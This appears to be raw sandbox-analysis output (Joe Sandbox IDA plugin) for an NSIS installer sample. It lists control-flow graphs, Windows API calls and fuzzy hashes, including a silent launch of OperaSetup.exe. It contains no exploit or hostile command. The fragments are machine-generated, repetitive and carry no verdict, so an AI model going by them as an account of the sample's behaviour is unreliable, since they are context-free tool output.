                                                                                                                                              • API String ID: 2803837635-3376623841
                                                                                                                                              • Opcode ID: a78e4ad808f85481dcd79512046ee08fb7c97768d62f5dc4e9826f195081d52b
                                                                                                                                              • Instruction ID: ad1f7a9ef70f4aee06910e8501363caf5be3f78a24e024e3506d72c770e38dd5
                                                                                                                                              • Opcode Fuzzy Hash: a78e4ad808f85481dcd79512046ee08fb7c97768d62f5dc4e9826f195081d52b
                                                                                                                                              • Instruction Fuzzy Hash: 0271A071D00204ABDB209FA4DD85B6E7AACEB05716F10417FE911B72D1DB789F408B6D

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 360 401794-4017b9 call 402dcb call 405fe8 365 4017c3-4017d5 call 4066a2 call 405f71 lstrcatW 360->365 366 4017bb-4017c1 call 4066a2 360->366 371 4017da-4017db call 406950 365->371 366->371 375 4017e0-4017e4 371->375 376 4017e6-4017f0 call 4069ff 375->376 377 401817-40181a 375->377 384 401802-401814 376->384 385 4017f2-401800 CompareFileTime 376->385 379 401822-40183e call 406192 377->379 380 40181c-40181d call 40616d 377->380 387 401840-401843 379->387 388 4018b2-4018db call 405727 call 403396 379->388 380->379 384->377 385->384 389 401894-40189e call 405727 387->389 390 401845-401883 call 4066a2 * 2 call 4066df call 4066a2 call 405d02 387->390 400 4018e3-4018ef SetFileTime 388->400 401 4018dd-4018e1 388->401 402 4018a7-4018ad 389->402 390->375 422 401889-40188a 390->422 405 4018f5-401900 CloseHandle 400->405 401->400 401->405 406 402c58 402->406 409 401906-401909 405->409 410 402c4f-402c52 405->410 407 402c5a-402c5e 406->407 412 40190b-40191c call 4066df lstrcatW 409->412 413 40191e-401921 call 4066df 409->413 410->406 419 401926-4023c7 call 405d02 412->419 413->419 419->407 426 402953-40295a 419->426 422->402 424 40188c-40188d 422->424 424->389 426->410
                                                                                                                                              APIs
                                                                                                                                              • lstrcatW.KERNEL32(00000000,00000000,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,004C5000,?,?,00000031), ref: 004017D5
                                                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,00000000,00000000,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,004C5000,?,?,00000031), ref: 004017FA
                                                                                                                                                • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00002000,004037D7,00464260,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                                                                                                                • Part of subcall function 00405727: lstrlenW.KERNEL32(0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                                • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                                                                                                                • Part of subcall function 00405727: lstrcatW.KERNEL32(0043A728,004030CD,004030CD,0043A728,00000000,00000000,00000000), ref: 00405782
                                                                                                                                                • Part of subcall function 00405727: SetWindowTextW.USER32(0043A728,0043A728), ref: 00405794
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                              • String ID: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0
                                                                                                                                              • API String ID: 1941528284-1546330588
                                                                                                                                              • Opcode ID: abfc48dbde18ea0f61bdba3ff75caee9a5c96404e809a9cb74966422e51516d8
                                                                                                                                              • Instruction ID: 9f42f1e7eaebfaebc1b2313fce90f35831c5a59d22c64b0766d7391dfec550b2
                                                                                                                                              • Opcode Fuzzy Hash: abfc48dbde18ea0f61bdba3ff75caee9a5c96404e809a9cb74966422e51516d8
                                                                                                                                              • Instruction Fuzzy Hash: 0541D771800114BACF117BB5CD85DAE3679EF45368B21863FF422F11E1D73D8AA19A2D

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 427 406a26-406a46 GetSystemDirectoryW 428 406a48 427->428 429 406a4a-406a4c 427->429 428->429 430 406a5d-406a5f 429->430 431 406a4e-406a57 429->431 433 406a60-406a93 wsprintfW LoadLibraryExW 430->433 431->430 432 406a59-406a5b 431->432 432->433
                                                                                                                                              APIs
                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A3D
                                                                                                                                              • wsprintfW.USER32 ref: 00406A78
                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A8C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                              • String ID: %s%S.dll$UXTHEME
                                                                                                                                              • API String ID: 2200240437-1106614640
                                                                                                                                              • Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                                                                                                              • Instruction ID: 2c328a31db22aac531adf2f34800fe5ee0562984a44f040f64af452ff7173633
                                                                                                                                              • Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                                                                                                              • Instruction Fuzzy Hash: 36F0FC3060011967CF14BB64DD0EF9B375C9B01704F10847AA546F10D0EB789668CF98

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 434 40349e-4034c6 GetTickCount 435 4035f6-4035fe call 403053 434->435 436 4034cc-4034f7 call 40361d SetFilePointer 434->436 441 403600-403604 435->441 442 4034fc-40350e 436->442 443 403510 442->443 444 403512-403520 call 403607 442->444 443->444 447 403526-403532 444->447 448 4035e8-4035eb 444->448 449 403538-40353e 447->449 448->441 450 403540-403546 449->450 451 403569-403585 call 406c11 449->451 450->451 452 403548-403568 call 403053 450->452 457 4035f1 451->457 458 403587-40358f 451->458 452->451 459 4035f3-4035f4 457->459 460 403591-403599 call 406244 458->460 461 4035b2-4035b8 458->461 459->441 465 40359e-4035a0 460->465 461->457 462 4035ba-4035bc 461->462 462->457 464 4035be-4035d1 462->464 464->442 468 4035d7-4035e6 SetFilePointer 464->468 466 4035a2-4035ae 465->466 467 4035ed-4035ef 465->467 466->449 469 4035b0 466->469 467->459 468->435 469->464
                                                                                                                                              APIs
                                                                                                                                              • GetTickCount.KERNEL32 ref: 004034B2
                                                                                                                                                • Part of subcall function 0040361D: SetFilePointer.KERNEL32(00000000,00000000,00000000,0040331B,?), ref: 0040362B
                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,004033C8,00000004,00000000,00000000,?,?,00403342,000000FF,00000000,00000000,00008001,?), ref: 004034E5
                                                                                                                                              • SetFilePointer.KERNEL32(00045AA4,00000000,00000000,004266F0,00004000,?,00000000,004033C8,00000004,00000000,00000000,?,?,00403342,000000FF,00000000), ref: 004035E0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FilePointer$CountTick
                                                                                                                                              • String ID: hA
                                                                                                                                              • API String ID: 1092082344-2144240161
                                                                                                                                              • Opcode ID: e11cf52a2002a60f9caf7e4f5257b2a9e139536fe8b899a245e26a0cd04ca586
                                                                                                                                              • Instruction ID: a6cc621958e3896f8f0562ac50284c64eb2e0996e34cc3673b0accbb5e92da07
                                                                                                                                              • Opcode Fuzzy Hash: e11cf52a2002a60f9caf7e4f5257b2a9e139536fe8b899a245e26a0cd04ca586
                                                                                                                                              • Instruction Fuzzy Hash: C231D076504201EFDB209F6AFE419663FACF720356B85823FF901A22F0CB749901AB1D

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 554 406079-406094 call 4066a2 call 40601c 559 406096-406098 554->559 560 40609a-4060a7 call 406950 554->560 561 4060f2-4060f4 559->561 564 4060b7-4060bb 560->564 565 4060a9-4060af 560->565 567 4060d1-4060da lstrlenW 564->567 565->559 566 4060b1-4060b5 565->566 566->559 566->564 568 4060dc-4060f0 call 405f71 GetFileAttributesW 567->568 569 4060bd-4060c4 call 4069ff 567->569 568->561 574 4060c6-4060c9 569->574 575 4060cb-4060cc call 405fbd 569->575 574->559 574->575 575->567
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00002000,004037D7,00464260,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                                                                                                                • Part of subcall function 0040601C: CharNextW.USER32(?,?,00456750,?,00406090,00456750,00456750,76F93420,?,76F92EE0,00405DCE,?,76F93420,76F92EE0,004BD000), ref: 0040602A
                                                                                                                                                • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 0040602F
                                                                                                                                                • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 00406047
                                                                                                                                              • lstrlenW.KERNEL32(00456750,00000000,00456750,00456750,76F93420,?,76F92EE0,00405DCE,?,76F93420,76F92EE0,004BD000), ref: 004060D2
                                                                                                                                              • GetFileAttributesW.KERNEL32(00456750,00456750,00456750,00456750,00456750,00456750,00000000,00456750,00456750,76F93420,?,76F92EE0,00405DCE,?,76F93420,76F92EE0), ref: 004060E2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                              • String ID: PgE
                                                                                                                                              • API String ID: 3248276644-3220684765
                                                                                                                                              • Opcode ID: b320ac714881839a993191b9b67f373f4f0dd5a8269bf5d6f48fcd2d5b08a690
                                                                                                                                              • Instruction ID: 4bebfd15c2bd202af51862231bcf25e973859f7a9abf5f27d8efd0e3f4a0fce5
                                                                                                                                              • Opcode Fuzzy Hash: b320ac714881839a993191b9b67f373f4f0dd5a8269bf5d6f48fcd2d5b08a690
                                                                                                                                              • Instruction Fuzzy Hash: 21F07835084A6259E622B7360C05AAF25098F8232470B423FFC43B22C1DF3D8973D17E

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 577 4061c1-4061cd 578 4061ce-406202 GetTickCount GetTempFileNameW 577->578 579 406211-406213 578->579 580 406204-406206 578->580 581 40620b-40620e 579->581 580->578 582 406208 580->582 582->581
                                                                                                                                              APIs
                                                                                                                                              • GetTickCount.KERNEL32 ref: 004061DF
                                                                                                                                              • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403663,004CD000,004D1000,004D1000,004D1000,004D1000,004D1000,004D1000,0040394F), ref: 004061FA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                                              • String ID: nsa
                                                                                                                                              • API String ID: 1716503409-2209301699
                                                                                                                                              • Opcode ID: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                                                                                                              • Instruction ID: f348173cd445ce0cff63ab1922c44f7ab34be52ec2d52f6d3f60174017d9ed76
                                                                                                                                              • Opcode Fuzzy Hash: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                                                                                                              • Instruction Fuzzy Hash: 3BF06D76701204BBEB109B59DD05E9AB7A8EBA1710F11803EEA01A6240E6B099648764

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 583 4071f5-4071fb 584 407200-40721e 583->584 585 4071fd-4071ff 583->585 586 4074f1-4074fe 584->586 587 40742c-407441 584->587 585->584 588 407528-40752c 586->588 589 407443-407459 587->589 590 40745b-407471 587->590 591 40758c-40759f 588->591 592 40752e-40754f 588->592 593 407474-40747b 589->593 590->593 598 4074a8-4074ae 591->598 596 407551-407566 592->596 597 407568-40757b 592->597 594 4074a2 593->594 595 40747d-407481 593->595 594->598 599 407630-40763a 595->599 600 407487-40749f 595->600 601 40757e-407585 596->601 597->601 603 406c53 598->603 604 40765b 598->604 607 407646-407659 599->607 600->594 605 407525 601->605 606 407587 601->606 608 406c5a-406c5e 603->608 609 406d9a-406dbb 603->609 610 406cff-406d03 603->610 611 406d6f-406d73 603->611 613 40765e-407662 604->613 605->588 619 40750a-407522 606->619 620 40763c 606->620 607->613 608->607 614 406c64-406c71 608->614 609->587 617 406d09-406d22 610->617 618 4075af-4075b9 610->618 615 406d79-406d8d 611->615 616 4075be-4075c8 611->616 614->604 622 406c77-406cbd 614->622 623 406d90-406d98 615->623 616->607 621 406d25-406d29 617->621 618->607 619->605 620->607 621->610 624 406d2b-406d31 621->624 625 406ce5-406ce7 622->625 626 406cbf-406cc3 622->626 623->609 623->611 627 406d33-406d3a 624->627 628 406d5b-406d6d 624->628 631 406cf5-406cfd 625->631 632 406ce9-406cf3 625->632 629 406cc5-406cc8 GlobalFree 626->629 630 406cce-406cdc GlobalAlloc 626->630 633 406d45-406d55 GlobalAlloc 627->633 634 406d3c-406d3f GlobalFree 627->634 628->623 629->630 630->604 635 406ce2 630->635 631->621 632->631 632->632 633->604 633->628 634->633 635->625
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8001648312b76757b4dc2f3646509216fc345bf83ee85411accbee75f523ad1d
                                                                                                                                              • Instruction ID: 24c32228aea39238aae05165091b6f794a4b9b1c66cd55bc1afee76a19a4bada
                                                                                                                                              • Opcode Fuzzy Hash: 8001648312b76757b4dc2f3646509216fc345bf83ee85411accbee75f523ad1d
                                                                                                                                              • Instruction Fuzzy Hash: 10A14471E04228DBDF28CFA8C8446ADBBB1FF44305F14856ED856BB281C7786A86DF45

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 636 4073f6-4073fa 637 40741c-407429 636->637 638 4073fc-4074fe 636->638 639 40742c-407441 637->639 648 407528-40752c 638->648 642 407443-407459 639->642 643 40745b-407471 639->643 645 407474-40747b 642->645 643->645 646 4074a2 645->646 647 40747d-407481 645->647 653 4074a8-4074ae 646->653 649 407630-40763a 647->649 650 407487-40749f 647->650 651 40758c-40759f 648->651 652 40752e-40754f 648->652 657 407646-407659 649->657 650->646 651->653 654 407551-407566 652->654 655 407568-40757b 652->655 658 406c53 653->658 659 40765b 653->659 660 40757e-407585 654->660 655->660 661 40765e-407662 657->661 662 406c5a-406c5e 658->662 663 406d9a-406dbb 658->663 664 406cff-406d03 658->664 665 406d6f-406d73 658->665 659->661 666 407525 660->666 667 407587 660->667 662->657 668 406c64-406c71 662->668 663->639 672 406d09-406d22 664->672 673 4075af-4075b9 664->673 669 406d79-406d8d 665->669 670 4075be-4075c8 665->670 666->648 677 40750a-407522 667->677 678 40763c 667->678 668->659 675 406c77-406cbd 668->675 676 406d90-406d98 669->676 670->657 674 406d25-406d29 672->674 673->657 674->664 679 406d2b-406d31 674->679 680 406ce5-406ce7 675->680 681 406cbf-406cc3 675->681 676->663 676->665 677->666 678->657 682 406d33-406d3a 679->682 683 406d5b-406d6d 679->683 686 406cf5-406cfd 680->686 687 406ce9-406cf3 680->687 684 406cc5-406cc8 GlobalFree 681->684 685 406cce-406cdc GlobalAlloc 681->685 688 406d45-406d55 GlobalAlloc 682->688 689 406d3c-406d3f GlobalFree 682->689 683->676 684->685 685->659 690 406ce2 685->690 686->674 687->686 687->687 688->659 688->683 689->688 690->680
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2384488d3f0122d52eec19d06177794e899fdfc3e1a025a719282f78321e7206
                                                                                                                                              • Instruction ID: b8cb9ce97df986fef79018f719ec18ee870a51f75f9c549f23c9243a2682c43e
                                                                                                                                              • Opcode Fuzzy Hash: 2384488d3f0122d52eec19d06177794e899fdfc3e1a025a719282f78321e7206
                                                                                                                                              • Instruction Fuzzy Hash: 48912370D04228CBDF28CF98C8947ADBBB1FF44305F14856AD856BB291C778A986DF45

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 691 40710c-407110 692 407116-40711a 691->692 693 4071c7-4071d6 691->693 694 407120-407134 692->694 695 40765b 692->695 696 40742c-407441 693->696 697 4075fa-407604 694->697 698 40713a-407143 694->698 699 40765e-407662 695->699 700 407443-407459 696->700 701 40745b-407471 696->701 704 407646-407659 697->704 702 407145 698->702 703 407148-407178 698->703 705 407474-40747b 700->705 701->705 702->703 703->693 712 406c44-406c4d 703->712 704->699 706 4074a2-4074ae 705->706 707 40747d-407481 705->707 706->712 709 407630-40763a 707->709 710 407487-40749f 707->710 709->704 710->706 712->695 713 406c53 712->713 714 406c5a-406c5e 713->714 715 406d9a-406dbb 713->715 716 406cff-406d03 713->716 717 406d6f-406d73 713->717 714->704 718 406c64-406c71 714->718 715->696 721 406d09-406d22 716->721 722 4075af-4075b9 716->722 719 406d79-406d8d 717->719 720 4075be-4075c8 717->720 718->695 724 406c77-406cbd 718->724 725 406d90-406d98 719->725 720->704 723 406d25-406d29 721->723 722->704 723->716 726 406d2b-406d31 723->726 727 406ce5-406ce7 724->727 728 406cbf-406cc3 724->728 725->715 725->717 729 406d33-406d3a 726->729 730 406d5b-406d6d 726->730 733 406cf5-406cfd 727->733 734 406ce9-406cf3 727->734 731 406cc5-406cc8 GlobalFree 728->731 732 406cce-406cdc GlobalAlloc 728->732 735 406d45-406d55 GlobalAlloc 729->735 736 406d3c-406d3f GlobalFree 729->736 730->725 731->732 732->695 737 406ce2 732->737 733->723 734->733 734->734 735->695 735->730 736->735 737->727
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 27b0d047e0c308e0b5114cd8a4e3873cb63df72f9853a9642e586e78b8cecf79
                                                                                                                                              • Instruction ID: 4da454054b0c3dd02772a9c96e50ae6a11cdbe5b18e0bc5540401a1e7d1606fc
                                                                                                                                              • Opcode Fuzzy Hash: 27b0d047e0c308e0b5114cd8a4e3873cb63df72f9853a9642e586e78b8cecf79
                                                                                                                                              • Instruction Fuzzy Hash: E4813471D04228DBDF24CFA8C8847ADBBB1FF45305F24816AD456BB281C778AA86DF45

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 738 406c11-406c34 739 406c36-406c39 738->739 740 406c3e-406c41 738->740 741 40765e-407662 739->741 742 406c44-406c4d 740->742 743 406c53 742->743 744 40765b 742->744 745 406c5a-406c5e 743->745 746 406d9a-407441 743->746 747 406cff-406d03 743->747 748 406d6f-406d73 743->748 744->741 749 406c64-406c71 745->749 750 407646-407659 745->750 759 407443-407459 746->759 760 40745b-407471 746->760 754 406d09-406d22 747->754 755 4075af-4075b9 747->755 751 406d79-406d8d 748->751 752 4075be-4075c8 748->752 749->744 757 406c77-406cbd 749->757 750->741 758 406d90-406d98 751->758 752->750 756 406d25-406d29 754->756 755->750 756->747 761 406d2b-406d31 756->761 762 406ce5-406ce7 757->762 763 406cbf-406cc3 757->763 758->746 758->748 764 407474-40747b 759->764 760->764 767 406d33-406d3a 761->767 768 406d5b-406d6d 761->768 771 406cf5-406cfd 762->771 772 406ce9-406cf3 762->772 769 406cc5-406cc8 GlobalFree 763->769 770 406cce-406cdc GlobalAlloc 763->770 765 4074a2-4074ae 764->765 766 40747d-407481 764->766 765->742 773 407630-40763a 766->773 774 407487-40749f 766->774 776 406d45-406d55 GlobalAlloc 767->776 777 406d3c-406d3f GlobalFree 767->777 768->758 769->770 770->744 778 406ce2 770->778 771->756 772->771 772->772 773->750 774->765 776->744 776->768 777->776 778->762
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
